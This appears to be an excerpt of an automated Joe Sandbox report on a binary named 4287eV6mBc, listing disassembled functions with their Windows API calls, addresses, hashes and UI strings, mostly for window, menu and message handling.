                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: 16d911de426de318c96d16e5f6c5f5c5a4872c27cf11ef1598ef36c09a1d5d6c
                                                      • Instruction ID: 97e2f906fc380baedb68eac51cdf8470a51c889f1d2554af8daa32bf616be91f
                                                      • Opcode Fuzzy Hash: 16d911de426de318c96d16e5f6c5f5c5a4872c27cf11ef1598ef36c09a1d5d6c
                                                      • Instruction Fuzzy Hash: 2341C635000180DFDB295F29EC88BF93B6AFB06371F185265FEA58A1E9C7718C41DB61
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,0066F910), ref: 0064A90B
                                                      • GetDriveTypeW.KERNEL32(00000061,006989A0,00000061), ref: 0064A9D5
                                                      • _wcscpy.LIBCMT ref: 0064A9FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: 930f142b71e313da21ddf7a9c71a0dd998d2b4f195147a989a215c9831d0187d
                                                      • Instruction ID: c67093906c8297bf0ad5ca2e96fdf5a4485a5be67515856640d1483a33bfef20
                                                      • Opcode Fuzzy Hash: 930f142b71e313da21ddf7a9c71a0dd998d2b4f195147a989a215c9831d0187d
                                                      • Instruction Fuzzy Hash: 1251C031158341AFC708EF54C996AAFBBAAFF85304F14482DF495972E2DB319D09CA83
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006686FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID: @U=u
                                                      • API String ID: 634782764-2594219639
                                                      • Opcode ID: 042781fbf3042bcccea21508b222548719a805092140e135294cf982d9c97dc2
                                                      • Instruction ID: 86b819986c3f65e9dea09fdb040afc0194c2b545d03dc70e7ab3feeea983a54d
                                                      • Opcode Fuzzy Hash: 042781fbf3042bcccea21508b222548719a805092140e135294cf982d9c97dc2
                                                      • Instruction Fuzzy Hash: E8516D30500254BFEB249B39DC89FAD7BA6BB05720F604315FA55E72A1CBB1AD80DB51
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0061C2F7
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0061C319
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0061C331
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0061C34F
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0061C370
                                                      • DestroyIcon.USER32(00000000), ref: 0061C37F
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0061C39C
                                                      • DestroyIcon.USER32(?), ref: 0061C3AB
                                                        • Part of subcall function 0066A4AF: DeleteObject.GDI32(00000000), ref: 0066A4E8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                      • String ID: @U=u
                                                      • API String ID: 2819616528-2594219639
                                                      • Opcode ID: a20b1a081419e0af1e1307bdc1ca192aeb6b6f8183b9c1042a2173e67b74fb8c
                                                      • Instruction ID: d78eb935beebcb9a9d526e11868c5fa3b75c30a36b16987fe68733b7159a82db
                                                      • Opcode Fuzzy Hash: a20b1a081419e0af1e1307bdc1ca192aeb6b6f8183b9c1042a2173e67b74fb8c
                                                      • Instruction Fuzzy Hash: 47515C70640249AFDB24DF65DC45FAE3BAAFB44320F144528F956D72A0DBB0ED90DB60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __i64tow__itow__swprintf
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 421087845-2263619337
                                                      • Opcode ID: 7f38de120a294dba5a62b9725ab78796d38238075eb0b1546bc03fa4f6337587
                                                      • Instruction ID: e575e0d3f6c067bb2f1ac40851ecc05ed303b2c558910df58a7b835de11918f4
                                                      • Opcode Fuzzy Hash: 7f38de120a294dba5a62b9725ab78796d38238075eb0b1546bc03fa4f6337587
                                                      • Instruction Fuzzy Hash: E841E571504205AFEB28DF35D846EBA77EBFF46300F24487EE589D7392EA3199428B10
                                                      APIs
                                                      • _memset.LIBCMT ref: 0066716A
                                                      • CreateMenu.USER32 ref: 00667185
                                                      • SetMenu.USER32(?,00000000), ref: 00667194
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00667221
                                                      • IsMenu.USER32(?), ref: 00667237
                                                      • CreatePopupMenu.USER32 ref: 00667241
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0066726E
                                                      • DrawMenuBar.USER32 ref: 00667276
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                      • String ID: 0$F
                                                      • API String ID: 176399719-3044882817
                                                      • Opcode ID: c1a0fd75a1914aa030da055a10bc34e5c726f9548c612b9d8469bbaced023453
                                                      • Instruction ID: 09828f2c9d5404f1951d66985fb7e3b600df2bca72b1ec2e5e98bacdd6de7007
                                                      • Opcode Fuzzy Hash: c1a0fd75a1914aa030da055a10bc34e5c726f9548c612b9d8469bbaced023453
                                                      • Instruction Fuzzy Hash: FB414774A01205EFDB10DF64E894E9ABBBAFF49314F144029F906A7361D771AE14CF90
                                                      APIs
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                        • Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00639014
                                                      • GetDlgCtrlID.USER32 ref: 0063901F
                                                      • GetParent.USER32 ref: 0063903B
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0063903E
                                                      • GetDlgCtrlID.USER32(?), ref: 00639047
                                                      • GetParent.USER32(?), ref: 00639063
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00639066
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: @U=u$ComboBox$ListBox
                                                      • API String ID: 1536045017-2258501812
                                                      • Opcode ID: fb29ed171851fc3c9b820c9417ee24bbef54c13b2ad5947527e562964cf59042
                                                      • Instruction ID: 8e434051696649b18817a841e8b916dd500029500d0fa63b069b7e1cdf765f2a
                                                      • Opcode Fuzzy Hash: fb29ed171851fc3c9b820c9417ee24bbef54c13b2ad5947527e562964cf59042
                                                      • Instruction Fuzzy Hash: D421B674A00109BBDF05ABA1CC89EFEBB7AEF49310F100119F961972B1DBB55815DA70
                                                      APIs
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                        • Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006390FD
                                                      • GetDlgCtrlID.USER32 ref: 00639108
                                                      • GetParent.USER32 ref: 00639124
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00639127
                                                      • GetDlgCtrlID.USER32(?), ref: 00639130
                                                      • GetParent.USER32(?), ref: 0063914C
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0063914F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: @U=u$ComboBox$ListBox
                                                      • API String ID: 1536045017-2258501812
                                                      • Opcode ID: f2cf3574435090dcbf4898ca485c056376d792a7404d53b9454e2f686383eca5
                                                      • Instruction ID: 9a127d63f3109ec70ebf4ded3505182694f5ea8eadd8ff358354df7f70f5ca13
                                                      • Opcode Fuzzy Hash: f2cf3574435090dcbf4898ca485c056376d792a7404d53b9454e2f686383eca5
                                                      • Instruction Fuzzy Hash: 2821C575A00109BBDF05ABA5CC89EFEBB7AFF49300F104019F961972A2DBB55815DB70
                                                      APIs
                                                      • GetParent.USER32 ref: 0063916F
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00639184
                                                      • _wcscmp.LIBCMT ref: 00639196
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00639211
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-1428604138
                                                      • Opcode ID: f6ecfbf5cce42ced5da936c5734d078e74b4cae98abd3d0355ac019e1c650bdc
                                                      • Instruction ID: b6dbc4c33deb248868e4a9a10de2c2167f11aa7dd9d1786ceebd71b6e8a61097
                                                      • Opcode Fuzzy Hash: f6ecfbf5cce42ced5da936c5734d078e74b4cae98abd3d0355ac019e1c650bdc
                                                      • Instruction Fuzzy Hash: 2B1123362D8707BAEB152624EC1ADA7379FDF01320F20002AF910E05E1EEE269115DE8
                                                      APIs
                                                      • _memset.LIBCMT ref: 00606E3E
                                                        • Part of subcall function 00608B28: __getptd_noexit.LIBCMT ref: 00608B28
                                                      • __gmtime64_s.LIBCMT ref: 00606ED7
                                                      • __gmtime64_s.LIBCMT ref: 00606F0D
                                                      • __gmtime64_s.LIBCMT ref: 00606F2A
                                                      • __allrem.LIBCMT ref: 00606F80
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00606F9C
                                                      • __allrem.LIBCMT ref: 00606FB3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00606FD1
                                                      • __allrem.LIBCMT ref: 00606FE8
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00607006
                                                      • __invoke_watson.LIBCMT ref: 00607077
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                      • Instruction ID: 856a654931c5a5bea91bbdafe4828d2b7ed08caebbeb58ee3b211aa9e1287d6f
                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                      • Instruction Fuzzy Hash: 7471F3B2E80717ABD718AE68DC41B9BB3AAAF04324F14822DF515E73C1E770ED508794
                                                      APIs
                                                      • _memset.LIBCMT ref: 00642542
                                                      • GetMenuItemInfoW.USER32(006A5890,000000FF,00000000,00000030), ref: 006425A3
                                                      • SetMenuItemInfoW.USER32(006A5890,00000004,00000000,00000030), ref: 006425D9
                                                      • Sleep.KERNEL32(000001F4), ref: 006425EB
                                                      • GetMenuItemCount.USER32(?), ref: 0064262F
                                                      • GetMenuItemID.USER32(?,00000000), ref: 0064264B
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00642675
                                                      • GetMenuItemID.USER32(?,?), ref: 006426BA
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00642700
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00642714
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00642735
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: 72c301be1ab02c7cea50da4ec4d265e9e3552aea5b8d60ac78324b2342e1e13a
                                                      • Instruction ID: 688bed4e1f5fe6a8d7c503e83fe147c47d4e92d4dd208eacda4b0f272d755972
                                                      • Opcode Fuzzy Hash: 72c301be1ab02c7cea50da4ec4d265e9e3552aea5b8d60ac78324b2342e1e13a
                                                      • Instruction Fuzzy Hash: 6D61907090024AAFDB11DF64DCA8EFEBBBAFB45304FA40059F842A7251D771AD45DB21
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00666FA5
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00666FA8
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00666FCC
                                                      • _memset.LIBCMT ref: 00666FDD
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00666FEF
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00667067
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: 1661d7ffc99e00f56b809f296197b50bbcde690b1be30fc0c40fc629ef821c6c
                                                      • Instruction ID: b9bc2cd2af58450ef9c268dce22400674e01eea986461a855c2aec1bb9e7e711
                                                      • Opcode Fuzzy Hash: 1661d7ffc99e00f56b809f296197b50bbcde690b1be30fc0c40fc629ef821c6c
                                                      • Instruction Fuzzy Hash: 09617B75900208AFDB10DFA4CC81EEE77BAAB09714F14419AFA15AB3A1C771AD45DFA0
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00636BBF
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00636C18
                                                      • VariantInit.OLEAUT32(?), ref: 00636C2A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00636C4A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00636C9D
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00636CB1
                                                      • VariantClear.OLEAUT32(?), ref: 00636CC6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00636CD3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00636CDC
                                                      • VariantClear.OLEAUT32(?), ref: 00636CEE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00636CF9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 45da5f70336cecdce869a2a6fdade1438967945baac1b18cf14e953195a0f563
                                                      • Instruction ID: 599383ebff29755799ac1d92bdf146de76cd320345374f9249f183c2b1c603a7
                                                      • Opcode Fuzzy Hash: 45da5f70336cecdce869a2a6fdade1438967945baac1b18cf14e953195a0f563
                                                      • Instruction Fuzzy Hash: 27415D71A00219AFCB04DFA9D8489AEBBFAFF48350F00C069F955E7261CB71A945CF90
                                                      APIs
                                                        • Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623
                                                      • GetSystemMetrics.USER32(0000000F), ref: 0066D47C
                                                      • GetSystemMetrics.USER32(0000000F), ref: 0066D49C
                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0066D6D7
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0066D6F5
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0066D716
                                                      • ShowWindow.USER32(00000003,00000000), ref: 0066D735
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0066D75A
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0066D77D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                      • String ID: @U=u
                                                      • API String ID: 1211466189-2594219639
                                                      • Opcode ID: 7ac4eb63eb277cbce3e60acc1ecf29582a581ba14fb78a26952eb48e70bb3b99
                                                      • Instruction ID: 3dba34d6966603d693d455746b4171e32d491992b8e8464a6b05bc8a3e355ba1
                                                      • Opcode Fuzzy Hash: 7ac4eb63eb277cbce3e60acc1ecf29582a581ba14fb78a26952eb48e70bb3b99
                                                      • Instruction Fuzzy Hash: ABB18871A00225EFDF14CF69C985BED7BB2BF48711F088069EC499B295DB74AD50CBA0
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 005E2EAE
                                                        • Part of subcall function 005E1DB3: GetClientRect.USER32(?,?), ref: 005E1DDC
                                                        • Part of subcall function 005E1DB3: GetWindowRect.USER32(?,?), ref: 005E1E1D
                                                        • Part of subcall function 005E1DB3: ScreenToClient.USER32(?,?), ref: 005E1E45
                                                      • GetDC.USER32 ref: 0061CD32
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0061CD45
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0061CD53
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0061CD68
                                                      • ReleaseDC.USER32(?,00000000), ref: 0061CD70
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0061CDFB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: @U=u$U
                                                      • API String ID: 4009187628-4110099822
                                                      • Opcode ID: e3a624dd57f07a0f4749cf9979552a7c6d8ddd2d8b6a0e40e6172592bcb508fb
                                                      • Instruction ID: 5e00372c41a24fb33a78b6a51b234334327759d2c38509b479f5284825810efd
                                                      • Opcode Fuzzy Hash: e3a624dd57f07a0f4749cf9979552a7c6d8ddd2d8b6a0e40e6172592bcb508fb
                                                      • Instruction Fuzzy Hash: FB71A131900245DFCF259F64D884AFE7FBAFF49320F18426AED559A2A6C7319C81DB50
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00655793
                                                      • inet_addr.WSOCK32(?,?,?), ref: 006557D8
                                                      • gethostbyname.WSOCK32(?), ref: 006557E4
                                                      • IcmpCreateFile.IPHLPAPI ref: 006557F2
